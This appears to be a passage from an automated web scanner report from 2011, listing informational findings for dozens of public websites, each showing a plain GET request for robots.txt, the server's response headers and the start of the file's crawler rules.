GET /robots.txt HTTP/1.0
Host: www.rent.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:40 GMT
Server: Apache
Set-Cookie: session=2fee3a9e0958bb30e0a34d055a73b111/1301751280/10675a96f6bab8dca7d100c9c76392d7; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:35:10 GMT
Cache-Control: must-revalidate
Expires: Sat, 02 Apr 2011 13:34:41 GMT
Set-Cookie: browser=1.2540130175128050; path=/; expires=Tue, 30-Mar-21 13:34:40 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from www.rent.com
Connection: close

Sitemap: http://www.rent.com/sitemap_index.xml.gz
User-agent: *
Disallow: /ajax/
Disallow: /base/
Disallow: /common/
Disallow: /email/
Disallow: /go/
Disallow: /guest/
Disallow: /java/
Disallow: /java
...[SNIP]...

24.702. http://www.rentals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rentals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rentals.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:14 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n35 ( iad-agg-n34), ht-d iad-agg-n34.panthercdn.com
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:29:25 GMT
Age: 2689
Content-Length: 804
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 11:25:21 GMT
X-Varnish: 1737498056
X-Cache: MISS
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-Agent: *

#
# Sitemap Global Ping (Google, Yahoo, MSN, Ask)
#
SITEMAP: http://www.rentals.com/sitemap.xml

#
# Utility Pages Exclusion
#
Disallow: /Ma
...[SNIP]...

24.703. http://www.reply.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reply.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reply.com

Response

HTTP/1.1 200 OK
Content-Length: 65
Content-Type: text/plain
Last-Modified: Fri, 28 Aug 2009 16:46:46 GMT
Accept-Ranges: bytes
ETag: "70d76221ff27ca1:17cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:43 GMT
Connection: close

User-agent: *
Disallow: /autos/
Disallow: /clicks/
Disallow:

24.704. http://www.retailmenot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retailmenot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.retailmenot.com

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:33:05 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 565
Connection: Close

User-agent: *
Disallow: /ajax/
Disallow: /ajax/geoLocate.php
Disallow: /comment.php
Disallow: /savings.php
Disallow: /coupons/blank-default
Disallow: /out/
Disallow: /out2/
Disallow: /printable/out/
D
...[SNIP]...

24.705. http://www.retrevo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retrevo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.retrevo.com

Response

HTTP/1.1 200 OK
ETag: W/"15024-1296151686000"
Last-Modified: Thu, 27 Jan 2011 18:08:06 GMT
Content-Type: text/plain
Content-Length: 15024
Date: Sat, 02 Apr 2011 13:38:23 GMT
Server: Apache-Coyote/1.1
Connection: close

Sitemap: http://www.retrevo.com/sitemap.xml

User-agent: LucidMedia
Crawl-delay: 10

User-agent: voyager/1.0
Disallow: /

User-agent: *
Disallow: /search
Disallow: /m/
Disallow: /n/vm/
Dis
...[SNIP]...

24.706. http://www.reuters.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:55 GMT
Server: Apache
Expires: Sat, 2 Apr 2011 13:28:19 GMT
Content-Length: 197
Age: 275
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /finance/stocks/option
Disallow: /finance/stocks/financialHighlights
Disallow: /search
SITEMAP: http://www.reuters.com/sitemap_news_index.xml

User-agent: Pipl
Disallow: /


24.707. http://www.ripoffreport.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ripoffreport.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:16:42 GMT
Content-Type: text/plain; charset=win-utf
Connection: close
Last-Modified: Tue, 02 Mar 2010 18:08:20 GMT
ETag: "2ea2555733baca1:0"
ROR-NODE: 12
Content-Length: 349
Accept-Ranges: bytes

User-agent: *
Disallow: /Common/
Disallow: /Register.aspx
Disallow: /PageNotFound.aspx
Disallow: /ForgotPassword.aspx
Disallow: /CreateAccount.aspx
Disallow: /CreateUserAccount.aspx
Disallow: /
...[SNIP]...

24.708. http://www.riteaid.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.riteaid.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.riteaid.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:09 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 11 Sep 2006 14:30:56 GMT
ETag: "430075-66-67eb0800"
Accept-Ranges: bytes
Content-Length: 102
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /secure/
Disallow: /sitesearch/
Disallow: /redir/
Disallow: /stores/locator/


24.709. http://www.rivals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rivals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rivals.com

Response

HTTP/1.1 200 OK
Content-Length: 177
Content-Type: text/plain
Last-Modified: Fri, 23 Sep 2005 18:39:08 GMT
Accept-Ranges: bytes
ETag: "0eeed146ec0c51:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:46:27 GMT
Connection: close

User-agent: * # directed to all robots
Disallow: /offendeduser.asp
Disallow: /events.asp
Disallow: /prayerlist.asp
Disallow: /stoCheckoutPage1.asp
Disallow: /stoCart.asp

24.710. http://www.rollingstone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rollingstone.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rollingstone.com

Response

HTTP/1.0 200 OK
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Cache-Control: private, max-age=2951
Date: Sat, 02 Apr 2011 13:55:16 GMT
Content-Length: 79
Connection: close

User-agent: *
Disallow: /cms.php
Disallow: /preview.php
Disallow: /*?print=true

24.711. http://www.rotoworld.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rotoworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rotoworld.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 15 Feb 2011 19:11:46 GMT
Accept-Ranges: bytes
ETag: "2f58453044cdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 126
Expires: Sat, 02 Apr 2011 13:58:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:58:31 GMT
Connection: close

User-agent: *
Disallow: /zcomponents
Disallow: /js
Disallow: /services
Disallow: /controls
Disallow: /zlibs
Allow: /


24.712. http://www.rottentomatoes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rottentomatoes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rottentomatoes.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:07 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 23:18:13 GMT
ETag: "af"
Accept-Ranges: bytes
Content-Length: 175
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:33:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /license/export/
Disallow: /search
Disallow: /user/id

Sitemap: http://www.rottentomatoes.com/siteIndex.xml

24.713. http://www.roxwel.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.roxwel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.roxwel.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:07 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Wed, 21 Jan 2009 22:23:02 GMT
ETag: "51658d-4fc-4610599541d80"
Accept-Ranges: bytes
Content-Length: 1276
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#For Google Adsense and Adwords Quality
User-agent: Mediapartners-Google
Disallow: /email/*
Disallow: /ms_asx/*
Disallow: /rmsmail/*
Disallow: /rate.php*
Disallow: /login.php*
Disallow: /titleb
...[SNIP]...

24.714. http://www.rr.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rr.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:54 GMT
Server: Apache
Last-Modified: Wed, 16 Feb 2011 05:08:44 GMT
ETag: "533f-17-4669af00"
Accept-Ranges: bytes
Content-Length: 23
Keep-Alive: timeout=3, max=385
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow:

24.715. http://www.rss2search.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rss2search.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rss2search.com

Response

HTTP/1.1 200 OK
Server: nginx/0.9.6
Date: Sat, 02 Apr 2011 13:42:19 GMT
Content-Type: text/plain
Content-Length: 35
Last-Modified: Fri, 03 Dec 2010 18:15:04 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Accept-Ranges: bytes

User-agent: *
Disallow: /delivery/

24.716. http://www.runescape.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.runescape.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.runescape.com

Response

HTTP/1.1 200 OK
Date: Sat, 02-Apr-2011 13:33:44 GMT
Server: JAGeX/3.1
Content-type: text/plain; charset=ISO-8859-1
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: Close
Content-length: 37

User-agent: Googlebot
Disallow: /a=*/

24.717. http://www.sacbee.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Mon, 12 Jul 2010 21:19:37 GMT
ETag: "13e0dcb-3bb-4c3b86e9"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:40:45 GMT
Content-Length: 955
Connection: close

# update log
# 2009-08-26 - kparker @ MI 727-7946968 added, then removed 1198 and newhomes.
# 209-01-29 - pbuckley @ MI added sitemap2 and sitemap3
# 2008-07-23 - pbuckley @ MI
# 2007/03/05 - rwm

Us
...[SNIP]...

24.718. http://www.safeway.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.safeway.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.safeway.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 10 Aug 2010 23:28:36 GMT
ETag: "65-42-7dfe7100"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:14:53 GMT
Content-Length: 66
Connection: close

User-agent: *
Disallow: /justforu
Disallow: /IFL/Grocery/justforu

24.719. http://www.salesforce.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.salesforce.com

Response

HTTP/1.0 200 OK
Server: SFDC
Last-Modified: Mon, 31 Jan 2011 09:38:26 GMT
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 06:53:17 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 11688
Date: Sat, 02 Apr 2011 13:45:22 GMT
Connection: close

# Robots.txt file for http://www.salesforce.com
# rh_24_Aug_09
# All robots will spider the domain
#
sitemap: http://www.salesforce.com/sitemapindex.xml
#
# Keep mis-configured Microsoft SharePoint se
...[SNIP]...

24.720. http://www.salon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.salon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.salon.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:17 GMT
Server: Apache
Connection: close
Content-Type: text/plain; charset=UTF-8

#
# robots.txt for http://www.salon.com
#
# check out http://info.webcrawler.com/mak/projects/robots/norobots.html
# for more info on what this is all about.
#
User-agent: *
Crawl-delay: 5
Disallow: /
...[SNIP]...

24.721. http://www.samsclub.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.samsclub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.samsclub.com

Response

HTTP/1.0 200 OK
Server: Apache
SamsHeader: EDC
forcelegacy: false
Last-Modified: Sun, 13 Mar 2011 08:44:05 GMT
ETag: "20c9-ce-49e593298df40"
Content-Type: text/plain
Cache-Control: max-age=1200
Date: Sat, 02 Apr 2011 13:38:34 GMT
Content-Length: 206
Connection: close
Set-Cookie: dcenv=EDC; path=/; domain=samsclub.com

# robots.txt generated for www.samsclub.com
User-agent: *
Disallow:
Disallow: /cgi-bin/
Disallow: /sams/checkout/
Disallow: /sams/account/
Disallow: /sams/cart/
Sitemap: http://www.samsclub.com/sitema
...[SNIP]...

24.722. http://www.savings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.savings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.savings.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "5rkrQpyY/Kn"
Last-Modified: Fri, 01 Apr 2011 13:49:28 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 268
Date: Sat, 02 Apr 2011 14:00:55 GMT
Connection: close

# All robots will spider the domain

User-agent: *
Disallow: /coupons/moreDeals.html
Disallow: /mpofferref
Disallow: /mpclick
Disallow: /twitterStatus.html
Disallow: /honeypot.html
Sitemap: http://www
...[SNIP]...

24.723. http://www.sbnation.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sbnation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sbnation.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:46 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:39 GMT
ETag: "7c194b-d0-49e83f7a3149b"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

24.724. http://www.scholastic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scholastic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scholastic.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 17 Dec 2008 18:51:14 GMT
ETag: "a1c8b46f7860c91:387e"
Server: nginx/0.7.64
Content-Type: text/plain
Content-Length: 7486
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:54:10 GMT
Connection: close
Expires: Wed, 07 Apr 2010 04:39:37 GMT

User-agent: schveritysearch
Disallow: /activities/adventure/index.htm
Disallow: /activities/asian-american/angel_island/index.htm
Disallow: /activities/asian-american/index.htm
Disallow: /activiti
...[SNIP]...

24.725. http://www.sciencedaily.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sciencedaily.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sciencedaily.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 28 Aug 2010 18:41:26 GMT
Accept-Ranges: bytes
Content-Length: 172
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ads/
Disallow: /cms/
Disallow: /scripts/
Disallow: /styles/
Disallow: /templates/
Disallow: /test/
Disallow: /intellicontact/
Disallow: /includes/

24.726. http://www.scottrade.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scottrade.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scottrade.com

Response

HTTP/1.1 200 OK
Content-Length: 260
Content-Type: text/plain
Last-Modified: Wed, 24 Mar 2010 18:33:33 GMT
Accept-Ranges: bytes
ETag: "6b15178280cbca1:2ce"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:44:39 GMT
Connection: close

User-agent: *
Disallow: /library/
Disallow: /library/css/
Disallow: /library/images/
Disallow: /library/includes/
Disallow: /library/js/
Disallow: /library/swf/
Disallow: /media/
Disallow: /me
...[SNIP]...

24.727. http://www.scout.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://www.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:5a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
Date: Sat, 02 Apr 2011 13:44:51 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

24.728. http://www.scribd.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scribd.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:24:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 502
Last-Modified: Thu, 31 Mar 2011 20:01:34 GMT
Connection: close
Vary: Accept-Encoding
X-Bot: 1
Accept-Ranges: bytes

User-agent: *
Disallow: /search/
Disallow: /notifications/
Disallow: /analytics/
Disallow: /docinfo/
Disallow: /word/add_to_favorites/
Disallow: /word/comment_login/
Disallow: /word/document_url/
Disa
...[SNIP]...

24.729. http://www.sears.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sears.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sears.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "3e6c58d907d462defbff8165818e0f27:1295976381"
Last-Modified: Tue, 25 Jan 2011 17:26:21 GMT
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:23:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:23:34 GMT
Content-Length: 3605
Connection: close
s-srvr:

# /robots.txt file for http://www.sears.com
# Version 1/25/10

User-agent: *
Disallow: /*10175
Disallow: /*10154
Disallow: /*10151
#Gift Registry
Disallow: /shc/s/CallGiftRegistryAnnouncementFormView

...[SNIP]...

24.730. http://www.seattlepi.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seattlepi.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 464
Content-Type: text/plain
ETag: "bfda8054c65bc91:fae"
Expires: Sat, 02 Apr 2011 13:32:09 GMT
Date: Sat, 02 Apr 2011 13:32:09 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /cgi-bin/
Disallow: /htdocs/
Disallow: /logs/
Disallow: /naa/
Disallow: /pi-cgi-bin/
Disallow: /piuser/
Disallow: /vote96/
...[SNIP]...

24.731. http://www.sendspace.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sendspace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sendspace.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
ETag: "2438101751"
Last-Modified: Fri, 01 Apr 2011 07:15:01 GMT
Content-Length: 148
Connection: close
Date: Sat, 02 Apr 2011 14:08:28 GMT
Server: Apache

User-agent: *
Disallow: /uploadprocerr.html
Disallow: /processupload.html
Disallow: /progressloading.html
Disallow: /defaults/
Disallow: /download/

24.732. http://www.seniorpeoplemeet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seniorpeoplemeet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seniorpeoplemeet.com

Response

HTTP/1.1 200 OK
Content-Length: 1215
Content-Type: text/plain
Content-Location: http://www.seniorpeoplemeet.com/robots.txt
Last-Modified: Thu, 03 Feb 2011 22:30:36 GMT
Accept-Ranges: bytes
ETag: "52b64efaf1c3cb1:539"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 14:09:07 GMT
Connection: close
Set-Cookie: NSC_QN-Tfojps=ffffffff09099c8d45525d5f4f58455e445a4a423660;Version=1;Max-Age=18000;path=/;domain=.seniorpeoplemeet.com;httponly

User-agent: Mediapartners-Google*
Disallow:

User-agent: Googlebot
Disallow:

User-agent: MSNBot
Disallow:

User-agent: Slurp
Disallow:

User-agent: Teoma
Disallow:

User-agent: Ub
...[SNIP]...

24.733. http://www.sephora.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sephora.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sephora.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.8e
Last-Modified: Thu, 09 Aug 2007 22:10:30 GMT
ETag: "23a57-20c-46bb90d6"
Cteonnt-Length: 524
Content-Type: text/plain
Cache-Control: private, max-age=36514
Date: Sat, 02 Apr 2011 13:50:09 GMT
Content-Length: 524
Connection: close

#added to allow google (3/26/03)
User-agent: googlebot
Disallow: /promotion/
Disallow: /util/
Disallow: /browse/templates/components/

#added to allow Yahoo Slurp (inktomi) (3/26/03)
User-agent
...[SNIP]...

24.734. http://www.sfgate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sfgate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:16 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Set-Cookie: Apache=173.193.214.243.1301751796949621; path=/; max-age=31536000; domain=.sfgate.com
Last-Modified: Fri, 20 Nov 2009 21:03:27 GMT
ETag: "117c9b3-448-478d3cea24f17"
Accept-Ranges: bytes
Content-Length: 1096
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/listings/
Disallow: /cgi-bin/mapquest/
Disallow: /cgi-bin/jusma/
Disallow: /cgi-bin/went/
Disallow: /chron500/
Disallow: /admin/
Disallow: /bible/
Disallow: /listings/
...[SNIP]...

24.735. http://www.shangri-la.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shangri-la.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shangri-la.com

Response

HTTP/1.0 200 OK
Content-Length: 53
Content-Type: text/plain
Content-Location: http://www.shangri-la.com/robots.txt
Last-Modified: Fri, 15 May 2009 00:35:25 GMT
Accept-Ranges: bytes
ETag: "5a45ad9f5d4c91:4a51"
Server: Microsoft-IIS/6.0
X-WebServer-By: WEB02
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://www.shangri-la.com
Date: Sat, 02 Apr 2011 13:44:50 GMT
Connection: close

User-Agent: *
Disallow: /Error404.aspx
Allow: /


24.736. http://www.sharebuilder.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharebuilder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sharebuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 691
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=5BA65078457E03305501D8B37C32B700; Path=/; Domain=.sharebuilder.com
Set-Cookie: TLTSID=5BA65078457E03305501D8B37C32B700; Path=/; Domain=.sharebuilder.com
HostName: A109
Date: Sat, 02 Apr 2011 13:43:02 GMT
Connection: close


User-agent: *
Sitemap: http://www.sharebuilder.com/ShareBuilder/sitemap.xml
Disallow: /about_us/jump
Disallow: /core
Disallow: /affiliates
Disallow: /401kResearch
Disallow: /QRPResearch
Disal
...[SNIP]...

24.737. http://www.shockwave.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shockwave.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shockwave.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Last-Modified: Tue, 29 Mar 2011 15:36:04 GMT
ETag: "110522e17-fb-49fa0d16ce100"
Accept-Ranges: bytes
Content-Length: 251
Content-Type: text/plain
Cache-Control: max-age=4230
Expires: Sat, 02 Apr 2011 14:55:12 GMT
Date: Sat, 02 Apr 2011 13:44:42 GMT
Connection: close

Sitemap: http://www.shockwave.com/sitemap.xml
User-agent: *
Disallow: /error/
Disallow: /services/
Disallow: /servicemanager/
Disallow: /content/
Disallow: /member/
Disallow: /bin/
Disallow: /
...[SNIP]...

24.738. http://www.shoebuy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoebuy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shoebuy.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 10 Mar 2010 18:40:02 GMT
ETag: "33d-a0476480"
Accept-Ranges: bytes
Content-Length: 829
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:51:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:51:38 GMT
Connection: close
Set-Cookie: sb2=AAAAgU2XKeoAAByIAwy/Ag==; path=/; expires=Thu, 31-Mar-16 13:51:38 GMT
Set-Cookie: NSC_1-26STU9-qh10.101.208.14=ffffffff096d444545525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:06:38 GMT;path=/

User-agent: *
Disallow: /cgi-bin/
Disallow: /cart
Disallow: /cust
Disallow: /viewGC
Disallow: /process
